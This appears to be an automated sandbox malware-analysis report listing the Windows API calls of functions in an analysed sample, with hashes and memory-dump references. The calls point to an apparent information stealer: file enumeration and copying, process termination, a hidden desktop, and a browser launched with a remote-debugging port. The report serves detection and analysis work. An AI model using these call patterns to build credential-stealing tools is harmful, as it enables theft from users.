                                • Part of subcall function 003ACAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003ACB46
                                • Part of subcall function 003ACAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 003ACBC9
                              • CoUninitialize.COMBASE ref: 003ACD09
                              • lstrcat.KERNEL32(?,?), ref: 003ACD2E
                              • lstrlen.KERNEL32(?), ref: 003ACD3B
                              • StrCmpCA.SHLWAPI(?,003BCFEC), ref: 003ACD55
                              • wsprintfA.USER32 ref: 003ACD7D
                              • wsprintfA.USER32 ref: 003ACD9C
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 003ACDB0
                              • wsprintfA.USER32 ref: 003ACDD8
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 003ACDF1
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 003ACE10
                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 003ACE28
                              • CloseHandle.KERNEL32(00000000), ref: 003ACE33
                              • CloseHandle.KERNEL32(00000000), ref: 003ACE3F
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003ACE54
                              • lstrcpy.KERNEL32(00000000,?), ref: 003ACE94
                              • FindNextFileA.KERNEL32(?,?), ref: 003ACF8D
                              • FindClose.KERNEL32(?), ref: 003ACF9F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                              • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 3860919712-2388001722
                              • Opcode ID: 4bb1ac1bf1a0a2275938d9814c1be12c296e7d629129b926851359d571956408
                              • Instruction ID: ef0cdadc3884e351876b06072639889d566110da531f0ad747449bbdd6c5bc5f
                              • Opcode Fuzzy Hash: 4bb1ac1bf1a0a2275938d9814c1be12c296e7d629129b926851359d571956408
                              • Instruction Fuzzy Hash: E9C14F72910619AFDB21DF64DC49EEE77B9EF55300F044598F50AA7280EE30AE58CF90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A1291
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12B4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A12BF
                              • lstrlen.KERNEL32(003C4CA8), ref: 003A12CA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12E7
                              • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A12F3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A131E
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A133A
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A135C
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A1376
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A13AF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A13D7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A13E2
                              • lstrlen.KERNEL32(003C1794), ref: 003A13ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A140A
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1416
                              • lstrlen.KERNEL32(?), ref: 003A1423
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1443
                              • lstrcat.KERNEL32(00000000,?), ref: 003A1451
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A147A
                              • StrCmpCA.SHLWAPI(?,00F2DAC8), ref: 003A14A3
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A14E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A150D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1535
                              • StrCmpCA.SHLWAPI(?,00F2E2D8), ref: 003A1552
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A1593
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A15BC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A15E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A1796
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17BE
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A17F5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 003A181C
                              • FindClose.KERNEL32(00000000), ref: 003A182B
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: 339e4c0627378969132cc0eaddb4b910b70dc56a537cb27cc3bfa0b95799b2ec
                              • Instruction ID: 84a39a0fa13f5742a7b0d6bb731a93324820ae15bc7fa15749d24c09283f7299
                              • Opcode Fuzzy Hash: 339e4c0627378969132cc0eaddb4b910b70dc56a537cb27cc3bfa0b95799b2ec
                              • Instruction Fuzzy Hash: B4C15831A11A06AFCF22EF69DC89AAF77B8EF55300F054528F846AB251DB34DC55CB90
                              APIs
                              • memset.MSVCRT ref: 00399790
                              • lstrcat.KERNEL32(?,?), ref: 003997A0
                              • lstrcat.KERNEL32(?,?), ref: 003997B1
                              • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 003997C3
                              • memset.MSVCRT ref: 003997D7
                                • Part of subcall function 003B3E70: lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B3EA5
                                • Part of subcall function 003B3E70: lstrcpy.KERNEL32(00000000,00F2EEB0), ref: 003B3ECF
                                • Part of subcall function 003B3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0039134E,?,0000001A), ref: 003B3ED9
                              • wsprintfA.USER32 ref: 00399806
                              • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00399827
                              • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00399844
                                • Part of subcall function 003B46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003B46B9
                                • Part of subcall function 003B46A0: Process32First.KERNEL32(00000000,00000128), ref: 003B46C9
                                • Part of subcall function 003B46A0: Process32Next.KERNEL32(00000000,00000128), ref: 003B46DB
                                • Part of subcall function 003B46A0: StrCmpCA.SHLWAPI(?,?), ref: 003B46ED
                                • Part of subcall function 003B46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B4702
                                • Part of subcall function 003B46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003B4711
                                • Part of subcall function 003B46A0: CloseHandle.KERNEL32(00000000), ref: 003B4718
                                • Part of subcall function 003B46A0: Process32Next.KERNEL32(00000000,00000128), ref: 003B4726
                                • Part of subcall function 003B46A0: CloseHandle.KERNEL32(00000000), ref: 003B4731
                              • lstrcat.KERNEL32(00000000,?), ref: 00399878
                              • lstrcat.KERNEL32(00000000,?), ref: 00399889
                              • lstrcat.KERNEL32(00000000,003C4B60), ref: 0039989B
                              • memset.MSVCRT ref: 003998AF
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003998D4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00399903
                              • StrStrA.SHLWAPI(00000000,00F2F6A0), ref: 00399919
                              • lstrcpyn.KERNEL32(005C93D0,00000000,00000000), ref: 00399938
                              • lstrlen.KERNEL32(?), ref: 0039994B
                              • wsprintfA.USER32 ref: 0039995B
                              • lstrcpy.KERNEL32(?,00000000), ref: 00399971
                              • Sleep.KERNEL32(00001388), ref: 003999E7
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                • Part of subcall function 003992B0: strlen.MSVCRT ref: 003992E1
                                • Part of subcall function 003992B0: strlen.MSVCRT ref: 003992FA
                                • Part of subcall function 003992B0: strlen.MSVCRT ref: 00399399
                                • Part of subcall function 003992B0: strlen.MSVCRT ref: 003993E6
                                • Part of subcall function 003B4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 003B4759
                                • Part of subcall function 003B4740: Process32First.KERNEL32(00000000,00000128), ref: 003B4769
                                • Part of subcall function 003B4740: Process32Next.KERNEL32(00000000,00000128), ref: 003B477B
                                • Part of subcall function 003B4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B479C
                                • Part of subcall function 003B4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 003B47AB
                                • Part of subcall function 003B4740: CloseHandle.KERNEL32(00000000), ref: 003B47B2
                                • Part of subcall function 003B4740: Process32Next.KERNEL32(00000000,00000128), ref: 003B47C0
                                • Part of subcall function 003B4740: CloseHandle.KERNEL32(00000000), ref: 003B47CB
                              • CloseDesktop.USER32(?), ref: 00399A1C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                              • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                              • API String ID: 958055206-1862457068
                              • Opcode ID: 4367f65a275d060b0b35d51f8d448022f68edb91904d87a324191916796343df
                              • Instruction ID: 3358b4e8b8c569d08df09850cd24186334687c6ed2ffd2e4d1bfdb94945ff287
                              • Opcode Fuzzy Hash: 4367f65a275d060b0b35d51f8d448022f68edb91904d87a324191916796343df
                              • Instruction Fuzzy Hash: 22917371A10608AFDB11DFA4DC89FEE77B8AF58700F104599F609AB181DF70AE44CBA4
                              APIs
                              • wsprintfA.USER32 ref: 003AE22C
                              • FindFirstFileA.KERNEL32(?,?), ref: 003AE243
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003AE263
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003AE27D
                              • wsprintfA.USER32 ref: 003AE2A2
                              • StrCmpCA.SHLWAPI(?,003BCFEC), ref: 003AE2B4
                              • wsprintfA.USER32 ref: 003AE2D1
                                • Part of subcall function 003AEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003AEE12
                              • wsprintfA.USER32 ref: 003AE2F0
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 003AE304
                              • lstrcat.KERNEL32(?,00F2F980), ref: 003AE335
                              • lstrcat.KERNEL32(?,003C1794), ref: 003AE347
                              • lstrcat.KERNEL32(?,?), ref: 003AE358
                              • lstrcat.KERNEL32(?,003C1794), ref: 003AE36A
                              • lstrcat.KERNEL32(?,?), ref: 003AE37E
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 003AE394
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE3D2
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE422
                              • DeleteFileA.KERNEL32(?), ref: 003AE45C
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                              • FindNextFileA.KERNEL32(00000000,?), ref: 003AE49B
                              • FindClose.KERNEL32(00000000), ref: 003AE4AA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                              • String ID: %s\%s$%s\*
                              • API String ID: 1375681507-2848263008
                              • Opcode ID: b477eb4d27df300f30e8c963d56d5efd43f7d64a51edae028d3cae45ae68823d
                              • Instruction ID: d47c02043ee684123685ab22e3888cda0dfc47bcfebf2183f84dfea96460d211
                              • Opcode Fuzzy Hash: b477eb4d27df300f30e8c963d56d5efd43f7d64a51edae028d3cae45ae68823d
                              • Instruction Fuzzy Hash: C4814D72900619AFCB21EF64DC49EEF77B9FF58300F044998B51A97141DA35AA58CFA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003916E2
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391719
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039176C
                              • lstrcat.KERNEL32(00000000), ref: 00391776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003917A2
                              • lstrcpy.KERNEL32(00000000,?), ref: 003918F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003918FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat
                              • String ID: \*.*
                              • API String ID: 2276651480-1173974218
                              • Opcode ID: c2650e485b5b0ae2d0a8356b58981ed0967ba615950bb3461d7e51c2fb748e1a
                              • Instruction ID: fa2c8c824928fd11d8788ef7c8f98f287e5ffb408b30e3c4b05aea1b7811302e
                              • Opcode Fuzzy Hash: c2650e485b5b0ae2d0a8356b58981ed0967ba615950bb3461d7e51c2fb748e1a
                              • Instruction Fuzzy Hash: 5B813031912A1BAFCF23EFA8D989EAF77B9AF14700F051124F805AB251DB309D15CB91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003ADD45
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003ADD4C
                              • wsprintfA.USER32 ref: 003ADD62
                              • FindFirstFileA.KERNEL32(?,?), ref: 003ADD79
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003ADD9C
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003ADDB6
                              • wsprintfA.USER32 ref: 003ADDD4
                              • DeleteFileA.KERNEL32(?), ref: 003ADE20
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 003ADDED
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                • Part of subcall function 003AD980: memset.MSVCRT ref: 003AD9A1
                                • Part of subcall function 003AD980: memset.MSVCRT ref: 003AD9B3
                                • Part of subcall function 003AD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AD9DB
                                • Part of subcall function 003AD980: lstrcpy.KERNEL32(00000000,?), ref: 003ADA0E
                                • Part of subcall function 003AD980: lstrcat.KERNEL32(?,00000000), ref: 003ADA1C
                                • Part of subcall function 003AD980: lstrcat.KERNEL32(?,00F2F670), ref: 003ADA36
                                • Part of subcall function 003AD980: lstrcat.KERNEL32(?,?), ref: 003ADA4A
                                • Part of subcall function 003AD980: lstrcat.KERNEL32(?,00F2DA98), ref: 003ADA5E
                                • Part of subcall function 003AD980: lstrcpy.KERNEL32(00000000,?), ref: 003ADA8E
                                • Part of subcall function 003AD980: GetFileAttributesA.KERNEL32(00000000), ref: 003ADA95
                              • FindNextFileA.KERNEL32(00000000,?), ref: 003ADE2E
                              • FindClose.KERNEL32(00000000), ref: 003ADE3D
                              • lstrcat.KERNEL32(?,00F2F980), ref: 003ADE66
                              • lstrcat.KERNEL32(?,00F2E498), ref: 003ADE7A
                              • lstrlen.KERNEL32(?), ref: 003ADE84
                              • lstrlen.KERNEL32(?), ref: 003ADE92
                              • lstrcpy.KERNEL32(00000000,?), ref: 003ADED2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                              • String ID: %s\%s$%s\*
                              • API String ID: 4184593125-2848263008
                              • Opcode ID: 990c210252e26c2293214c1ec2f90069b02456abb9d025d3dcd3c3261900f891
                              • Instruction ID: 5737fab87e288639b21e9913ed7c4f5dd0ff5b97deeecd36162b685fba19c784
                              • Opcode Fuzzy Hash: 990c210252e26c2293214c1ec2f90069b02456abb9d025d3dcd3c3261900f891
                              • Instruction Fuzzy Hash: 86614E72910609AFCB21EB64DC89EEE77B9FF58300F0045A8F546A7251DF34AA58DB90
                              APIs
                              • wsprintfA.USER32 ref: 003AD54D
                              • FindFirstFileA.KERNEL32(?,?), ref: 003AD564
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003AD584
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003AD59E
                              • lstrcat.KERNEL32(?,00F2F980), ref: 003AD5E3
                              • lstrcat.KERNEL32(?,00F2F960), ref: 003AD5F7
                              • lstrcat.KERNEL32(?,?), ref: 003AD60B
                              • lstrcat.KERNEL32(?,?), ref: 003AD61C
                              • lstrcat.KERNEL32(?,003C1794), ref: 003AD62E
                              • lstrcat.KERNEL32(?,?), ref: 003AD642
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AD682
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AD6D2
                              • FindNextFileA.KERNEL32(00000000,?), ref: 003AD737
                              • FindClose.KERNEL32(00000000), ref: 003AD746
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
